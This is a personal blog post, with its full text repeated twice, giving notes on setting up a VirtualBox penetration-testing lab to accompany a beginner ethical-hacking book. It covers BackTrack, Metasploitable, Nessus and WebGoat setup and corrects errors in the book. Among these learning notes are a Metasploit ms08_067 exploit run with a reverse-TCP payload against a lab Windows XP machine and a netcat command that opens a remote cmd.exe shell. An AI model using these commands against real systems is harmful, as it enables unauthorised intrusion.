I've been working my way through a book on hacking and penetration testing:
The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)
Overall, it is a good read, and great for beginners like me. One shortcoming is that it doesn't tell you how to set up a hacking lab on your computer. That is, how to set up different operating systems running on virtual machines (like virtualbox), as an alternative to networking multiple physical machines. I struggled a bit to set up a hacking lab, so I thought I would post my notes here.
Steps:
1. Download Virtualbox (https://www.virtualbox.org/) for whatever operating system you are using. I started off using a Mac runnig snow leopard, but my Mac is old and can't handle much, so I switched to a PC running windows 7 with 8 GB ram (64 bit Machine), which I have available.
2. Download Backtrack Linux (http://www.backtrack-linux.org) and make sure you follow the instruction at these two pages: http://www.backtrack-linux.org/wiki/index.php/VirtualBox_Install and http://www.backtrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk
One modification: AFTER installing backtrack but BEFORE installing virtualbox guest additions, do the following:
apt-get update
apt-get upgrade
apt-get install dkms
3. Download a couple of operating systems to use as targets to practice on (this is what is recommended in the book). Here are some options:
- Windows XP, preferably with no service pack, or SP1. If you can only get SP2 or SP3, then fine.
- Metasploitable (http://www.offensive-security.com/metasploit-unleashed/Metasploitable). This is the link to the torrent file.
- Anything else you want to try. Windows 7 maybe? An older version of Ubuntu?
4. Set up the "guest" virtual machines for these other operating systems similar to the way you installed backtrack linux and according to the documentation for Virtualbox. BUT, you should make one change to the default settings that the book and above resources (except the Virtualbox documentation) does not mention: For EACH guest machine, under "Settings" -> "Network" in the "Attached to:" field, select from the drop-down menu "Bridge Adapter" (instead of the default NAT). Then go ahead and start your guest machines.
This will allow your machines to ping, nmap, etc. each other (note that if Windows XP firewall is enabled, then it won't reply to pings, nmap, etc.).
Installing Win XP in a guest machine was pretty easy. The same is true for Metasploitable - once you know what to do, which is the following (after you have unzipped the metasploitable.zjip file):
1. In the Virtualbox Manager (I'm using 4.1.16 r78094), click "New" then "Next"
2. Enter a name for the virtual machine, e.g. metasploit
3. Select the amount of memory, e.g. 512 MB and click next
4. Leave Startup Disk checked, and select "Use Existing Hard Disk". Click the folder and navigate to the Metasploitable.vmdk file
5. Click Open, then Create.
Don't forget to change the Video memory to 64 MB (or 128 MB), and change the Network to Bridge Adapter.
Also, the login credentials for Metasploitable are user: msfadmin, and password: msfadmin.
UPDATE 1: There is a typo on page 34 of the book. "set type 5 mx" should instead be "set type = mx"
UPDATE 2: Getting Nessus to work on Firefox running on Backtrack Linux 5 R2 was a pain - the official instructions at the backtrack wiki actually do not work for x64 - but I eventually got it working (for 32 bit, even on a 64 bit machine with BT 64 bit). Here is how (thanks to the backtrack wiki and this post). First follow the instructions at the backtrack wiki page with instructions to install flash player ONLY TO REMOVE the existing flash installation on backtrack (if there is any). Don't do the rest yet:
These instructions are fine. Now SKIP the part about installing for x64. Next, use the following commands to get the flash player and install the plug-in:
UPDATE 2a: now install nessus:
apt-get install nessus
You can add a user now (by typing at the prompt: /opt/nessus/sbin/nessus-adduser
) or later. Now register for an activation code at: http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code
You will receive an activation code by email. Lets call this @activation_code@. Once you get it, run the following command (replacing @activation_code@ with your activation code - yes, replace the @ symbols too):
/opt/nessus/bin/nessus-fetch --register @activation_code@
UPDATE 3: To log into nessus, you will need to create a user account on nessus. To do so, open up the console and enter the following command:
/opt/nessus/sbin/nessus-adduser
UPDATE 3a: To start nessus, you must type at the command prompt:
/opt/nessus/sbin/nessus-service -D
after nessus processes the plug ins, it should be ready for starting. Note that we are using the 32 bit version (I don't know why the 64 bit version doesn't work). Now you should be able to start firefox, navigate to nessus (https://127.0.0.1:8834) and see a login screen.
UPDATE 4: On page 72 of the book you, you are instructed to launch Metasploit using the following command:
/pentest/exploits/framework3/msfconsole
On backtrack linux R2 64 bit, this won't work. Instead you might use:
/pentest/exploits/framework2/msfconsole
This will launch the Metasploit, but there is another problem. On page 74 of the book, you are instructed to use the "search" command in Metasploit. It won't work - the search command is not supported. Instead, you need to update Metasploit. From the terminal, type:
msfupdate
(but FIRST, you might want to follow this advice at this link: update Metasploit on Backtrack Linux R2). This will take some time. After it is done, launch Metasploit:
msfconsole
And at the "msf > " prompt, check to see that you have the latest version:
msf >version
(just type version at the prompt). Now you should be able to use the search command in Metasploit.
UPDATE 5: After following some instructions from the book, you'll start an exploit using the "exploit" command at the msf prompt. For example, I am practicing attaching a VirtualBox running Windows XP SP2, so after launching msfconsole, I did the following at the msf > prompt:
use exploit/windows/smb/ms08_067_ntapi
set payload windows/vncinject/reverse_tcp
set RHOST 192..... (victim machine, i.e. win xp sp2 machine, ip address)
set LHOST 192..... (attacker, i.e. backtrack linux machine, ipaddress)
exploit
Now you have access to the victim machine. But in your terminal, there is no prompt. Just go to the terminal and hit enter and you will get your msf > prompt back. There are no instructions in the book on how to stop the exploit, so I just type quit at the prompt and then relaunch msfconsole - that seems to do the trick.
UPDATE 6: I'm trying to use Autopwn automation on Fast-track Web in Backtrack. When I select Autopwn automation from the web browser, the browser displays only HTML instead of a menu. I thought that the problem was with Java not being installed in firefox, so I followed these instructions to intall/update the Java plugin in Firefox. That didn't solve the problem. Then I came across this post which states that autopwn won't work after updating Metasploit, because the updating removes the db_autopwn file. So I followed those instructions and downloaded a new db_autopwn file from the link that is available here, placed it in /opt/metasploit/msf3/plugins, and then edited autopwn.py (you can find the directory using the command find / -name autopwn.py). I rebooted BT5 and still it didn't fix the issue. I then updated Fast Track by loading the Fast Track Interactive application from the kstart dragon and selecting update (1 on the menu). I even updated Firefox to the latest version. Still, Autopwn Automation doesn't work on the web GUI. I'll give up for now and just use Fast Track Interactive.
UPDATE 7: Ok, forget Firefox. Autopwn Automation works fine if you access it using Konqueror.
UPDATE 8: In case you want to transfer files between the host and the guest, you can to the following: on the host machine, click "Devices" -> "Shared Folders" -> "Transient Folders" -> click the green "Add Shared Folders (ins)" icon -> In folder path click the down arrow, select "other" and browse to the folder you want to select, then click "ok". Then in a Terminal in the guest, you can type:
mount -t vboxsf name_of_the_folder_you_shared /mnt
name_of_the_folder_you_shared is the name of the folder that you shared as it appears under "Transient Folders" in the Shared Folders folder of the Settings box. (The command I used is:
mount -t vboxsf shareme /mnt
because I shared a folder called "shareme")
That folder will now appear in the /mnt directory
UPDATE 9: Getting Webgoat running on BackTrack Linux was a huge pain. This link helped, and so did this link. Here is what I did:
1. Open up a terminal, and update everything in sight:
apt-get update
apt-get upgrade
2. If you don't have the Java stuff installed, then install it. While you're at it, install p7zip:
apt-get install p7zip
apt-get install openjdk-6-jre openjdk-6-jdk
3. Extract the files, then move them, and make the .sh file executable:
p7zip -d OWASP_Standard WebGoat-5.3_RC1.7z
mkdir /pentest/web/webgoat
mv WebGoat-5.3_RC1/* /pentest/web/webgoat/
chmod +x /pentest/web/webgoat/webgoat.sh
4. At this point, you need to rename a file:
cd /pentest/web/webgoat/tomcat/webapps
mv webgoat.war WebGoat.war
cd /pentest/web/webgoat
(note that you need to be in the /pentest/web/webgoat directory for webgoat to run properly; this is because of the way the paths are defined in the webgoat.sh file)
5. Now start webgoat:
/pentest/web/webgoat/webgoat.sh start80 (or start8080)
6. open up a browser and go to: http://127.0.0.1/WebGoat/attack (or http://127.0.0.1:8080/WebGoat/attack) and log in with:
user: guest
password: guest
UPDATE #10: There is a mistake on page 133, in the section on using Netcat:
meterpreter > nc –L –p 5777 –e cmd.exe
should be instead:
meterpreter > execute -f "nc.exe –L –p 5777 –e cmd.exe"
More hints and advice to come, hopefully.
The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)
Overall, it is a good read, and great for beginners like me. One shortcoming is that it doesn't tell you how to set up a hacking lab on your computer. That is, how to set up different operating systems running on virtual machines (like virtualbox), as an alternative to networking multiple physical machines. I struggled a bit to set up a hacking lab, so I thought I would post my notes here.
Steps:
1. Download Virtualbox (https://www.virtualbox.org/) for whatever operating system you are using. I started off using a Mac runnig snow leopard, but my Mac is old and can't handle much, so I switched to a PC running windows 7 with 8 GB ram (64 bit Machine), which I have available.
2. Download Backtrack Linux (http://www.backtrack-linux.org) and make sure you follow the instruction at these two pages: http://www.backtrack-linux.org/wiki/index.php/VirtualBox_Install and http://www.backtrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk
One modification: AFTER installing backtrack but BEFORE installing virtualbox guest additions, do the following:
apt-get update
apt-get upgrade
apt-get install dkms
3. Download a couple of operating systems to use as targets to practice on (this is what is recommended in the book). Here are some options:
- Windows XP, preferably with no service pack, or SP1. If you can only get SP2 or SP3, then fine.
- Metasploitable (http://www.offensive-security.com/metasploit-unleashed/Metasploitable). This is the link to the torrent file.
- Anything else you want to try. Windows 7 maybe? An older version of Ubuntu?
4. Set up the "guest" virtual machines for these other operating systems similar to the way you installed backtrack linux and according to the documentation for Virtualbox. BUT, you should make one change to the default settings that the book and above resources (except the Virtualbox documentation) does not mention: For EACH guest machine, under "Settings" -> "Network" in the "Attached to:" field, select from the drop-down menu "Bridge Adapter" (instead of the default NAT). Then go ahead and start your guest machines.
This will allow your machines to ping, nmap, etc. each other (note that if Windows XP firewall is enabled, then it won't reply to pings, nmap, etc.).
Installing Win XP in a guest machine was pretty easy. The same is true for Metasploitable - once you know what to do, which is the following (after you have unzipped the metasploitable.zjip file):
1. In the Virtualbox Manager (I'm using 4.1.16 r78094), click "New" then "Next"
2. Enter a name for the virtual machine, e.g. metasploit
3. Select the amount of memory, e.g. 512 MB and click next
4. Leave Startup Disk checked, and select "Use Existing Hard Disk". Click the folder and navigate to the Metasploitable.vmdk file
5. Click Open, then Create.
Don't forget to change the Video memory to 64 MB (or 128 MB), and change the Network to Bridge Adapter.
Also, the login credentials for Metasploitable are user: msfadmin, and password: msfadmin.
UPDATE 1: There is a typo on page 34 of the book. "set type 5 mx" should instead be "set type = mx"
UPDATE 2: Getting Nessus to work on Firefox running on Backtrack Linux 5 R2 was a pain - the official instructions at the backtrack wiki actually do not work for x64 - but I eventually got it working (for 32 bit, even on a 64 bit machine with BT 64 bit). Here is how (thanks to the backtrack wiki and this post). First follow the instructions at the backtrack wiki page with instructions to install flash player ONLY TO REMOVE the existing flash installation on backtrack (if there is any). Don't do the rest yet:
root@bt:~# apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla root@bt:~# rm -f /usr/lib/firefox/plugins/*flash* root@bt:~# rm -f /usr/lib/firefox-addons/plugins/*flash* root@bt:~# rm -f /usr/lib/mozilla/plugins/*flash* root@bt:~# rm -f ~/.mozilla/plugins/*flash*so root@bt:~# rm -rfd /usr/lib/nspluginwrapper
These instructions are fine. Now SKIP the part about installing for x64. Next, use the following commands to get the flash player and install the plug-in:
wget http://fpdownload.macromedia.com/get/flashplayer/pdc/11.1.102.63/install_flash_player_11_linux.i386.tar.gz tar xvzf install_flash_player_11_linux.i386.tar.gz mkdir ~/.mozilla/plugins mv libflashplayer.so ~/.mozilla/plugins/
UPDATE 2a: now install nessus:
apt-get install nessus
You can add a user now (by typing at the prompt: /opt/nessus/sbin/nessus-adduser
) or later. Now register for an activation code at: http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code
You will receive an activation code by email. Lets call this @activation_code@. Once you get it, run the following command (replacing @activation_code@ with your activation code - yes, replace the @ symbols too):
/opt/nessus/bin/nessus-fetch --register @activation_code@
UPDATE 3: To log into nessus, you will need to create a user account on nessus. To do so, open up the console and enter the following command:
/opt/nessus/sbin/nessus-adduser
UPDATE 3a: To start nessus, you must type at the command prompt:
/opt/nessus/sbin/nessus-service -D
after nessus processes the plug ins, it should be ready for starting. Note that we are using the 32 bit version (I don't know why the 64 bit version doesn't work). Now you should be able to start firefox, navigate to nessus (https://127.0.0.1:8834) and see a login screen.
UPDATE 4: On page 72 of the book you, you are instructed to launch Metasploit using the following command:
/pentest/exploits/framework3/msfconsole
On backtrack linux R2 64 bit, this won't work. Instead you might use:
/pentest/exploits/framework2/msfconsole
This will launch the Metasploit, but there is another problem. On page 74 of the book, you are instructed to use the "search" command in Metasploit. It won't work - the search command is not supported. Instead, you need to update Metasploit. From the terminal, type:
msfupdate
(but FIRST, you might want to follow this advice at this link: update Metasploit on Backtrack Linux R2). This will take some time. After it is done, launch Metasploit:
msfconsole
And at the "msf > " prompt, check to see that you have the latest version:
msf >version
(just type version at the prompt). Now you should be able to use the search command in Metasploit.
UPDATE 5: After following some instructions from the book, you'll start an exploit using the "exploit" command at the msf prompt. For example, I am practicing attaching a VirtualBox running Windows XP SP2, so after launching msfconsole, I did the following at the msf > prompt:
use exploit/windows/smb/ms08_067_ntapi
set payload windows/vncinject/reverse_tcp
set RHOST 192..... (victim machine, i.e. win xp sp2 machine, ip address)
set LHOST 192..... (attacker, i.e. backtrack linux machine, ipaddress)
exploit
Now you have access to the victim machine. But in your terminal, there is no prompt. Just go to the terminal and hit enter and you will get your msf > prompt back. There are no instructions in the book on how to stop the exploit, so I just type quit at the prompt and then relaunch msfconsole - that seems to do the trick.
UPDATE 6: I'm trying to use Autopwn automation on Fast-track Web in Backtrack. When I select Autopwn automation from the web browser, the browser displays only HTML instead of a menu. I thought that the problem was with Java not being installed in firefox, so I followed these instructions to intall/update the Java plugin in Firefox. That didn't solve the problem. Then I came across this post which states that autopwn won't work after updating Metasploit, because the updating removes the db_autopwn file. So I followed those instructions and downloaded a new db_autopwn file from the link that is available here, placed it in /opt/metasploit/msf3/plugins, and then edited autopwn.py (you can find the directory using the command find / -name autopwn.py). I rebooted BT5 and still it didn't fix the issue. I then updated Fast Track by loading the Fast Track Interactive application from the kstart dragon and selecting update (1 on the menu). I even updated Firefox to the latest version. Still, Autopwn Automation doesn't work on the web GUI. I'll give up for now and just use Fast Track Interactive.
UPDATE 7: Ok, forget Firefox. Autopwn Automation works fine if you access it using Konqueror.
UPDATE 8: In case you want to transfer files between the host and the guest, you can to the following: on the host machine, click "Devices" -> "Shared Folders" -> "Transient Folders" -> click the green "Add Shared Folders (ins)" icon -> In folder path click the down arrow, select "other" and browse to the folder you want to select, then click "ok". Then in a Terminal in the guest, you can type:
mount -t vboxsf name_of_the_folder_you_shared /mnt
name_of_the_folder_you_shared is the name of the folder that you shared as it appears under "Transient Folders" in the Shared Folders folder of the Settings box. (The command I used is:
mount -t vboxsf shareme /mnt
because I shared a folder called "shareme")
That folder will now appear in the /mnt directory
UPDATE 9: Getting Webgoat running on BackTrack Linux was a huge pain. This link helped, and so did this link. Here is what I did:
1. Open up a terminal, and update everything in sight:
apt-get update
apt-get upgrade
2. If you don't have the Java stuff installed, then install it. While you're at it, install p7zip:
apt-get install p7zip
apt-get install openjdk-6-jre openjdk-6-jdk
3. Extract the files, then move them, and make the .sh file executable:
p7zip -d OWASP_Standard WebGoat-5.3_RC1.7z
mkdir /pentest/web/webgoat
mv WebGoat-5.3_RC1/* /pentest/web/webgoat/
chmod +x /pentest/web/webgoat/webgoat.sh
4. At this point, you need to rename a file:
cd /pentest/web/webgoat/tomcat/webapps
mv webgoat.war WebGoat.war
cd /pentest/web/webgoat
(note that you need to be in the /pentest/web/webgoat directory for webgoat to run properly; this is because of the way the paths are defined in the webgoat.sh file)
5. Now start webgoat:
/pentest/web/webgoat/webgoat.sh start80 (or start8080)
6. open up a browser and go to: http://127.0.0.1/WebGoat/attack (or http://127.0.0.1:8080/WebGoat/attack) and log in with:
user: guest
password: guest
UPDATE #10: There is a mistake on page 133, in the section on using Netcat:
meterpreter > nc –L –p 5777 –e cmd.exe
should be instead:
meterpreter > execute -f "nc.exe –L –p 5777 –e cmd.exe"
More hints and advice to come, hopefully.